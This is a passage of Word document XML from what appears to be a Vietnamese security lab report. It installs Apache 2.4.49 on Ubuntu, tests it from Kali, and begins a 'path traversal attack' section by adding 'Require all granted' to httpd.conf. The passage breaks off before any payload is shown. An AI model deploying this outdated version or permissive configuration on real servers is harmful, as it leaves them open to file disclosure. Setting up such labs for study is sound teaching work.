    <w:p w14:paraId="6B137CE3" w14:textId="354D3BF1" w:rsidR="00FF70FB" w:rsidRDefault="00FF70FB" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc171085241"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Kiểm tra kết nối mạng của Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="45E8A6A1" w14:textId="293E28E0" w:rsidR="00944AB7" w:rsidRDefault="00944AB7" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCCB06" w14:textId="2D7F3FCE" w:rsidR="00944AB7" w:rsidRDefault="00862C0D" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E4016">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05BF94A3" wp14:editId="21B5D9AE">
            <wp:extent cx="3901778" cy="1615580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1110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480" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3901778" cy="1615580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BCCBE" w14:textId="580F2EAF" w:rsidR="00FF70FB" w:rsidRPr="0055738F" w:rsidRDefault="00FF70FB" w:rsidP="00FF70FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc171085242"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Kiểm tra kết nối mạng của Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="38C13837" w14:textId="4055907D" w:rsidR="00A62334" w:rsidRDefault="005F22A8" w:rsidP="007B19F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="007F0A99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0011185E">
        <w:t>Cài đặt Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5142C90E" w14:textId="5839EF10" w:rsidR="003F2659" w:rsidRDefault="003F2659" w:rsidP="007B19F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện trên Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="007B19F1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E295C09" w14:textId="3A2CE2BA" w:rsidR="0011185E" w:rsidRDefault="003E780C" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="003E780C">
        <w:t>Truy cập vào trang</w:t>
      </w:r>
      <w:r w:rsidR="005F72B2">
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r w:rsidRPr="003E780C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="005F72B2" w:rsidRPr="007B19F1">
          <w:t>https://archive.apache.org/dist/httpd/httpd-2.4.49.tar.gz</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005F72B2" w:rsidRPr="00172A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00810760" w:rsidRPr="00172A6C">
        <w:t xml:space="preserve"> thực hiện tải Apache phiên bản 2.4.49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C7088" w14:textId="0F7E5B26" w:rsidR="00910F90" w:rsidRPr="005A6286" w:rsidRDefault="00DC754E" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="005727BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">update: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A27238">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC854E" w14:textId="5689D1BC" w:rsidR="005A6286" w:rsidRPr="005719BA" w:rsidRDefault="008E3B2A" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt các thư viện như: </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3B2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3B2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3B2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>pcre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F2659" w:rsidRPr="00A27238">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt-get install gcc make libpcre3-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B098370" w14:textId="59790118" w:rsidR="005719BA" w:rsidRPr="004B4A9D" w:rsidRDefault="00363C0E" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96621">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cài đặt thư viện </w:t>
      </w:r>
      <w:r w:rsidRPr="003854C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APR-util</w:t>
      </w:r>
      <w:r w:rsidR="00E12DE9">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004651BC" w:rsidRPr="00E96621">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt-get install libapr1-dev libaprutil1-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14080784" w14:textId="3FDF8F0B" w:rsidR="004B4A9D" w:rsidRPr="00704F10" w:rsidRDefault="00A96FB2" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Giải nén thư mục mới tải về: </w:t>
      </w:r>
      <w:r w:rsidR="00704F10" w:rsidRPr="00704F10">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tar -xzvf httpd-2.4.49.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E05D7A0" w14:textId="430BDFD3" w:rsidR="00704F10" w:rsidRPr="001618F7" w:rsidRDefault="00A742B8" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Di chuyển đến thư mục vừa giải nén: </w:t>
      </w:r>
      <w:r w:rsidR="001618F7" w:rsidRPr="001618F7">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidR="001618F7" w:rsidRPr="001618F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpd-2.4.49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E47CD" w14:textId="2D07D0BC" w:rsidR="001618F7" w:rsidRPr="00E6444E" w:rsidRDefault="00C9602B" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra và chuẩn bị môi trường biên dịch: </w:t>
      </w:r>
      <w:r w:rsidR="00E6444E" w:rsidRPr="00E6444E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./configure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EC98F" w14:textId="1AAAB62D" w:rsidR="00E6444E" w:rsidRPr="003C3864" w:rsidRDefault="004D007C" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Biên dịch Apache: </w:t>
      </w:r>
      <w:r w:rsidR="003C3864" w:rsidRPr="003C3864">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538291C" w14:textId="3461E41A" w:rsidR="003C3864" w:rsidRPr="00CB1DB7" w:rsidRDefault="00326B8B" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cài đặt Apache: </w:t>
      </w:r>
      <w:r w:rsidR="00CB1DB7" w:rsidRPr="00CB1DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>make install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C5C341" w14:textId="77777777" w:rsidR="00F20A18" w:rsidRPr="00F20A18" w:rsidRDefault="00BF6ADE" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Sau khi cài đặt thành công thực hiện kiểm tra</w:t>
      </w:r>
      <w:r w:rsidR="002530BC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE518E5" w14:textId="08F61D11" w:rsidR="00CB1DB7" w:rsidRPr="0013306E" w:rsidRDefault="002530BC" w:rsidP="00F20A18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013306E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/usr/local/apache2/bin/httpd -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E03D5" w14:textId="51C3F20A" w:rsidR="00463901" w:rsidRDefault="009818AF" w:rsidP="00AB538F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834114">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65293AB4" wp14:editId="79BDF9C2">
            <wp:extent cx="5509737" cy="434378"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="9446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8985" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5509737" cy="434378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="292CCBB4" w14:textId="28FA5A6A" w:rsidR="00AB538F" w:rsidRPr="00E77BD1" w:rsidRDefault="00AB538F" w:rsidP="00AB538F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc171085243"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Phiên bản Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="5DB1CFAF" w14:textId="0E271F6C" w:rsidR="00E77BD1" w:rsidRPr="0013306E" w:rsidRDefault="00231D35" w:rsidP="00AB538F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Lưu ý: khi server khởi động lại Apache sẽ tự động tắt</w:t>
      </w:r>
      <w:r w:rsidR="00103490">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> để khởi động lại</w:t>
      </w:r>
      <w:r w:rsidR="0013306E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004234D0" w:rsidRPr="0013306E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/usr/local/apache2/bin/apachectl -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A580E" w14:textId="7487A5C4" w:rsidR="004234D0" w:rsidRPr="008D03FD" w:rsidRDefault="00CE7AC9" w:rsidP="00AB538F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra trên máy Kali: </w:t>
      </w:r>
      <w:r w:rsidR="008D03FD" w:rsidRPr="008D03FD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="008D03FD" w:rsidRPr="00A2616F">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.0.2.15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AFC015B" w14:textId="4569BF02" w:rsidR="00604E60" w:rsidRDefault="003F486F" w:rsidP="00AB538F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC51CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A7D6E9F" wp14:editId="1909BFC7">
            <wp:extent cx="2918713" cy="434378"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="15908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6622" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2918713" cy="434378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785BB1A" w14:textId="18595A54" w:rsidR="00AB538F" w:rsidRPr="00AB538F" w:rsidRDefault="00AB538F" w:rsidP="00AB538F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc171085244"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Kiểm tra Apache</w:t>
      </w:r>
      <w:r w:rsidR="00E44CF1">
        <w:t xml:space="preserve"> trên Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A43C7B" w14:textId="2963EB10" w:rsidR="008C6FF5" w:rsidRDefault="00AE6611" w:rsidP="004119D5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tấn công </w:t>
      </w:r>
      <w:r w:rsidR="00B551D0" w:rsidRPr="00B551D0">
        <w:t>Path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276656B8" w14:textId="020220E7" w:rsidR="00140A4D" w:rsidRDefault="00B551D0" w:rsidP="004119D5">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="007F0A99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0091449E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00652A85" w:rsidRPr="00652A85">
        <w:t>ấu hình Directory directive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D11764" w14:textId="577B0D80" w:rsidR="004119D5" w:rsidRPr="004119D5" w:rsidRDefault="00140A4D" w:rsidP="004119D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện câu lệnh</w:t>
      </w:r>
      <w:r w:rsidR="00796908">
        <w:t xml:space="preserve"> trên Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDDD31" w14:textId="63BE3A57" w:rsidR="00497C8D" w:rsidRDefault="00497C8D" w:rsidP="004119D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796908">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nano /usr/local/apache2/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC8900F" w14:textId="0A529FD3" w:rsidR="00796908" w:rsidRPr="003D252D" w:rsidRDefault="00796908" w:rsidP="007F0A99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thêm </w:t>
      </w:r>
      <w:r w:rsidR="00E4584B">
        <w:t xml:space="preserve">vào file: </w:t>
      </w:r>
      <w:r w:rsidR="00B872E6" w:rsidRPr="003D252D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Require</w:t>
      </w:r>
      <w:r w:rsidR="003D252D" w:rsidRPr="003D252D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> all granted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD037FF" w14:textId="77777777" w:rsidR="003D252D" w:rsidRDefault="003D252D" w:rsidP="007F0A99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA1666" w14:textId="2F98465D" w:rsidR="007A4603" w:rsidRDefault="006614A5" w:rsidP="007F0A99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="780"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C52DDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44AA1D95" wp14:editId="5326F5A5">
            <wp:extent cx="2225040" cy="722903"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="214505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3005" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2229819" cy="724456"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9AF6E" w14:textId="32FF5118" w:rsidR="007F0A99" w:rsidRDefault="007F0A99" w:rsidP="007F0A99">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
